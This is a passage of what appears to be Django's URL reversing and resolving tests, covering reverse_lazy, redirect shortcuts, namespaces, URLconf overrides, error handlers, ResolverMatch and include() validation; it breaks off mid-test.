def test_redirect_with_lazy_reverse(self):
response = self.client.get("/redirect/")
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user(
"alfred", "alfred@example.com", password="testpw"
)
response = self.client.get("/login_required_view/")
self.assertRedirects(
response, "/login/?next=/login_required_view/", status_code=302
)
self.client.force_login(alfred)
response = self.client.get("/login_required_view/")
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
"Some URL: %s" % reverse_lazy("some-login-page"), "Some URL: /login/"
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get("/")
self.assertEqual(
request.build_absolute_uri(reverse_lazy("some-login-page")),
"http://testserver/login/",
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
"settings.py",
extra=(
"from django.urls import reverse_lazy\n"
"LOGIN_URL = reverse_lazy('login')"
),
)
def test_lazy_in_settings(self):
out, err = self.run_manage(["check"])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, "/hi-there/")
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, "/hi-there/")
def test_redirect_to_view_name(self):
res = redirect("hardcoded2")
self.assertEqual(res.url, "/hardcoded/doc.pdf")
res = redirect("places", 1)
self.assertEqual(res.url, "/places/1/")
res = redirect("headlines", year="2008", month="02", day="17")
self.assertEqual(res.url, "/headlines/2008.02.17/")
with self.assertRaises(NoReverseMatch):
redirect("not-a-view")
def test_redirect_to_url(self):
res = redirect("/foo/")
self.assertEqual(res.url, "/foo/")
res = redirect("http://example.com/")
self.assertEqual(res.url, "http://example.com/")
# Assert that we can redirect using UTF-8 strings
res = redirect("/æøå/abc/")
self.assertEqual(res.url, "/%C3%A6%C3%B8%C3%A5/abc/")
# Assert that no imports are attempted when dealing with a relative path
        # (previously, the below would result in a UnicodeEncodeError from __import__)
res = redirect("/æøå.abc/")
self.assertEqual(res.url, "/%C3%A6%C3%B8%C3%A5.abc/")
res = redirect("os.path")
self.assertEqual(res.url, "os.path")
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), "/includes/nested_path/")
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, "/absolute_arg_view/")
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.namespace_urls")
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
("urlobject-view", [], {}),
("urlobject-view", [37, 42], {}),
("urlobject-view", [], {"arg1": 42, "arg2": 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
("inner-nothing", [], {}),
("inner-nothing", [37, 42], {}),
("inner-nothing", [], {"arg1": 42, "arg2": 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
"blahblah:urlobject-view",
"test-ns1:blahblah:urlobject-view",
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
("normal-view", [], {}, "/normal/"),
("normal-view", [37, 42], {}, "/normal/37/42/"),
("normal-view", [], {"arg1": 42, "arg2": 37}, "/normal/42/37/"),
("special-view", [], {}, "/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
("included_namespace_urls:inc-normal-view", [], {}, "/included/normal/"),
(
"included_namespace_urls:inc-normal-view",
[37, 42],
{},
"/included/normal/37/42/",
),
(
"included_namespace_urls:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/included/normal/42/37/",
),
("included_namespace_urls:inc-special-view", [], {}, "/included/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
("test-ns1:urlobject-view", [], {}, "/test1/inner/"),
("test-ns1:urlobject-view", [37, 42], {}, "/test1/inner/37/42/"),
(
"test-ns1:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/test1/inner/42/37/",
),
("test-ns1:urlobject-special-view", [], {}, "/test1/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
("new-ns1:urlobject-view", [], {}, "/newapp1/inner/"),
("new-ns1:urlobject-view", [37, 42], {}, "/newapp1/inner/37/42/"),
(
"new-ns1:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/newapp1/inner/42/37/",
),
("new-ns1:urlobject-special-view", [], {}, "/newapp1/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
("newapp:urlobject-view", [], {}, "/new-default/inner/"),
("newapp:urlobject-view", [37, 42], {}, "/new-default/inner/37/42/"),
(
"newapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/new-default/inner/42/37/",
),
("newapp:urlobject-special-view", [], {}, "/new-default/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
(
"included_namespace_urls:test-ns3:urlobject-view",
[],
{},
"/included/test3/inner/",
),
(
"included_namespace_urls:test-ns3:urlobject-view",
[37, 42],
{},
"/included/test3/inner/37/42/",
),
(
"included_namespace_urls:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/included/test3/inner/42/37/",
),
(
"included_namespace_urls:test-ns3:urlobject-special-view",
[],
{},
"/included/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
("inc-ns1:inc-normal-view", [], {}, "/ns-included1/normal/"),
("inc-ns1:inc-normal-view", [37, 42], {}, "/ns-included1/normal/37/42/"),
(
"inc-ns1:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/normal/42/37/",
),
("inc-ns1:inc-special-view", [], {}, "/ns-included1/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
("app-ns1:inc-normal-view", [], {}, "/app-included1/normal/"),
("app-ns1:inc-normal-view", [37, 42], {}, "/app-included1/normal/37/42/"),
(
"app-ns1:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/app-included1/normal/42/37/",
),
("app-ns1:inc-special-view", [], {}, "/app-included1/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
("inc-outer:inc-normal-view", [], {"outer": 42}, "/ns-outer/42/normal/"),
("inc-outer:inc-normal-view", [42], {}, "/ns-outer/42/normal/"),
(
"inc-outer:inc-normal-view",
[],
{"arg1": 37, "arg2": 4, "outer": 42},
"/ns-outer/42/normal/37/4/",
),
("inc-outer:inc-normal-view", [42, 37, 4], {}, "/ns-outer/42/normal/37/4/"),
("inc-outer:inc-special-view", [], {"outer": 42}, "/ns-outer/42/+%5C$*/"),
("inc-outer:inc-special-view", [42], {}, "/ns-outer/42/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
("inc-ns1:test-ns3:urlobject-view", [], {}, "/ns-included1/test3/inner/"),
(
"inc-ns1:test-ns3:urlobject-view",
[37, 42],
{},
"/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:test-ns3:urlobject-special-view",
[],
{},
"/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[37, 42],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/ns-included1/ns-included4/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view",
[],
{},
"/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
("testapp:urlobject-view", [], {}, "/default/inner/"),
("testapp:urlobject-view", [37, 42], {}, "/default/inner/37/42/"),
(
"testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"/default/inner/42/37/",
),
("testapp:urlobject-special-view", [], {}, "/default/inner/+%5C$*/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
("testapp:urlobject-view", [], {}, "test-ns3", "/default/inner/"),
(
"testapp:urlobject-view",
[37, 42],
{},
"test-ns3",
"/default/inner/37/42/",
),
(
"testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"test-ns3",
"/default/inner/42/37/",
),
(
"testapp:urlobject-special-view",
[],
{},
"test-ns3",
"/default/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
("nodefault:urlobject-view", [], {}, None, "/other2/inner/"),
("nodefault:urlobject-view", [37, 42], {}, None, "/other2/inner/37/42/"),
(
"nodefault:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
None,
"/other2/inner/42/37/",
),
("nodefault:urlobject-special-view", [], {}, None, "/other2/inner/+%5C$*/"),
("nodefault:urlobject-view", [], {}, "other-ns1", "/other1/inner/"),
(
"nodefault:urlobject-view",
[37, 42],
{},
"other-ns1",
"/other1/inner/37/42/",
),
(
"nodefault:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"other-ns1",
"/other1/inner/42/37/",
),
(
"nodefault:urlobject-special-view",
[],
{},
"other-ns1",
"/other1/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_special_chars_namespace(self):
test_urls = [
(
"special:included_namespace_urls:inc-normal-view",
[],
{},
"/+%5C$*/included/normal/",
),
(
"special:included_namespace_urls:inc-normal-view",
[37, 42],
{},
"/+%5C$*/included/normal/37/42/",
),
(
"special:included_namespace_urls:inc-normal-view",
[],
{"arg1": 42, "arg2": 37},
"/+%5C$*/included/normal/42/37/",
),
(
"special:included_namespace_urls:inc-special-view",
[],
{},
"/+%5C$*/included/+%5C$*/",
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
("inc-ns5:inner-nothing", [], {"outer": "70"}, "/inc70/"),
(
"inc-ns5:inner-extra",
[],
{"extra": "foobar", "outer": "78"},
"/inc78/extra/foobar/",
),
("inc-ns5:inner-nothing", ["70"], {}, "/inc70/"),
("inc-ns5:inner-extra", ["78", "foobar"], {}, "/inc78/extra/foobar/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
(
"inc-ns1:testapp:urlobject-view",
[],
{},
None,
"/ns-included1/test4/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
None,
"/ns-included1/test4/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
None,
"/ns-included1/test4/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
None,
"/ns-included1/test4/inner/+%5C$*/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
"inc-ns1:test-ns3",
"/ns-included1/test3/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
(
"inc-ns1:testapp:urlobject-view",
[],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/",
),
(
"inc-ns1:testapp:urlobject-view",
[37, 42],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/37/42/",
),
(
"inc-ns1:testapp:urlobject-view",
[],
{"arg1": 42, "arg2": 37},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/42/37/",
),
(
"inc-ns1:testapp:urlobject-special-view",
[],
{},
"nonexistent:test-ns3",
"/ns-included1/test4/inner/+%5C$*/",
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(
name=name, args=args, kwargs=kwargs, current_app=current_app
):
self.assertEqual(
reverse(name, args=args, kwargs=kwargs, current_app=current_app),
expected,
)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.content, b"outer:/test/me/,inner:/inner_urlconf/second_test/"
)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 200)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 404)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 404)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b"outer:,inner:/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.NullChangeURLconfMiddleware" % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get("/test/me/")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.content, b"outer:/test/me/,inner:/inner_urlconf/second_test/"
)
response = self.client.get("/inner_urlconf/second_test/")
self.assertEqual(response.status_code, 200)
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseInnerInResponseMiddleware" % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b"/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseOuterInResponseMiddleware" % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get("/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseInnerInStreaming" % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get("/second_test/")
self.assertEqual(response.status_code, 200)
self.assertEqual(b"".join(response), b"/second_test/")
@override_settings(
MIDDLEWARE=[
"%s.ChangeURLconfMiddleware" % middleware.__name__,
"%s.ReverseOuterInStreaming" % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get("/second_test/")
b"".join(self.client.get("/second_test/"))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(
MIDDLEWARE=["%s.ChangeURLconfMiddleware" % middleware.__name__]
):
self.client.get(reverse("inner"))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = "urlpatterns_reverse.urls_error_handlers"
urlconf_callables = "urlpatterns_reverse.urls_error_handlers_callables"
self.resolver = URLResolver(RegexPattern(r"^$"), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r"^$"), urlconf_callables)
def test_named_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), empty_view)
def test_callable_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(
self.callable_resolver.resolve_error_handler(code), empty_view
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls_without_handlers")
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get("/test/")
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get("/bad_view/")
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see the 'urlpatterns' variable with valid patterns "
"in the file then the issue is probably caused by a circular "
"import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get("/test/me/")
@override_settings(ROOT_URLCONF="urlpatterns_reverse.namespace_urls")
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for (
path_,
url_name,
app_name,
namespace,
view_name,
func,
args,
kwargs,
) in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get("/resolver_match/")
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, "test-resolver-match")
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve("/no_kwargs/42/37/")),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name='no-kwargs', app_names=[], "
"namespaces=[], route='^no_kwargs/([0-9]+)/([0-9]+)/$')",
)
def test_repr_extra_kwargs(self):
self.assertEqual(
repr(resolve("/mixed_args/1986/11/")),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, args=(), "
"kwargs={'arg2': '11', 'extra': True}, url_name='mixed-args', "
"app_names=[], namespaces=[], "
"route='^mixed_args/([0-9]+)/(?P<arg2>[0-9]+)/$', "
"captured_kwargs={'arg2': '11'}, extra_kwargs={'extra': True})",
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.reverse_lazy_urls")
def test_classbased_repr(self):
self.assertEqual(
repr(resolve("/redirect/")),
"ResolverMatch(func=urlpatterns_reverse.views.LazyRedirectView, "
"args=(), kwargs={}, url_name=None, app_names=[], "
"namespaces=[], route='redirect/')",
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
def test_repr_functools_partial(self):
tests = [
("partial", "template.html"),
("partial_nested", "nested_partial.html"),
("partial_wrapped", "template.html"),
]
for name, template_name in tests:
with self.subTest(name=name):
func = (
f"functools.partial({views.empty_view!r}, "
f"template_name='{template_name}')"
)
self.assertEqual(
repr(resolve(f"/{name}/")),
f"ResolverMatch(func={func}, args=(), kwargs={{}}, "
f"url_name='{name}', app_names=[], namespaces=[], "
f"route='{name}/')",
)
@override_settings(ROOT_URLCONF="urlpatterns.path_urls")
def test_pickling(self):
msg = "Cannot pickle ResolverMatch."
with self.assertRaisesMessage(pickle.PicklingError, msg):
pickle.dumps(resolve("/users/"))
@override_settings(ROOT_URLCONF="urlpatterns_reverse.erroneous_urls")
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, "view must be a callable"):
path("uncallable-object/", views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(
get_callable("urlpatterns_reverse.views.empty_view"), empty_view
)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.views.i_should_not_exist")
def test_attributeerror_not_hidden(self):
msg = "I am here to confuse django.urls.get_callable"
with self.assertRaisesMessage(AttributeError, msg):
get_callable("urlpatterns_reverse.views_broken.i_am_broken")
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable("test")
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable("foo.bar")
def test_parent_module_does_not_exist(self):
msg = "Parent module urlpatterns_reverse.foo does not exist."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.foo.bar")
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.tests.resolve_test_data")
class IncludeTests(SimpleTestCase):
url_patterns = [
path("inner/", views.empty_view, name="urlobject-view"),
re_path(
r"^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$",
views.empty_view,
name="urlobject-view",
),
re_path(r"^inner/\+\\\$\*/$", views.empty_view, name="urlobject-special-view"),
]
app_urls = URLObject("inc-app")
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
"Specifying a namespace in include() without providing an "
"app_name is not supported."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, "namespace")
def test_include_4_tuple(self):
msg = "Passing a 4-tuple to include() is not supported."
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace", "blah"))
def test_include_3_tuple(self):
msg = "Passing a 3-tuple to include() is not supported."
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace"))
def test_include_3_tuple_namespace(self):
msg = (
"Cannot override the namespace for a dynamic module that provides a "
"namespace."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace"), "namespace")
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, "app_name")),
(self.url_patterns, "app_name", "app_name"),
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, "app_name"), namespace="namespace"),
(self.url_patterns, "app_name", "namespace"),
)
def test_include_app_name(self):
self.assertEqual(include(self.app_urls), (self.app_urls, "inc-app", "inc-app"))
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, "namespace"), (self.app_urls, "inc-app", "namespace")
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
"/lookahead-/a-city/",
"/lookbehind-/a-city/",
"/lookahead+/a-city/",
"/lookbehind+/a-city/",
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {"city": "a-city"})
def test_invalid_resolve(self):
test_urls = [
"/lookahead-/not-a-city/",
"/lookbehind-/not-a-city/",
"/lookahead+/other-city/",
"/lookbehind+/other-city/",
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
("lookahead-positive", {"city": "a-city"}, "/lookahead+/a-city/"),
("lookahead-negative", {"city": "a-city"}, "/lookahead-/a-city/"),
("lookbehind-positive", {"city": "a-city"}, "/lookbehind+/a-city/"),
("lookbehind-negative", {"city": "a-city"}, "/lookbehind-/a-city/"),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
("lookahead-positive", {"city": "other-city"}),
("lookahead-negative", {"city": "not-a-city"}),
("lookbehind-positive", {"city": "other-city"}),
("lookbehind-negative", {"city": "not-a-city"}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class ReverseResolvedTests(SimpleTestCase):
def test_rereverse(self):
match = resolve("/resolved/12/")
self.assertEqual(
reverse(match.url_name, args=match.args, kwargs=match.kwargs),
"/resolved/12/",
)
match = resolve("/resolved-overridden/12/url/")
self.assertEqual(
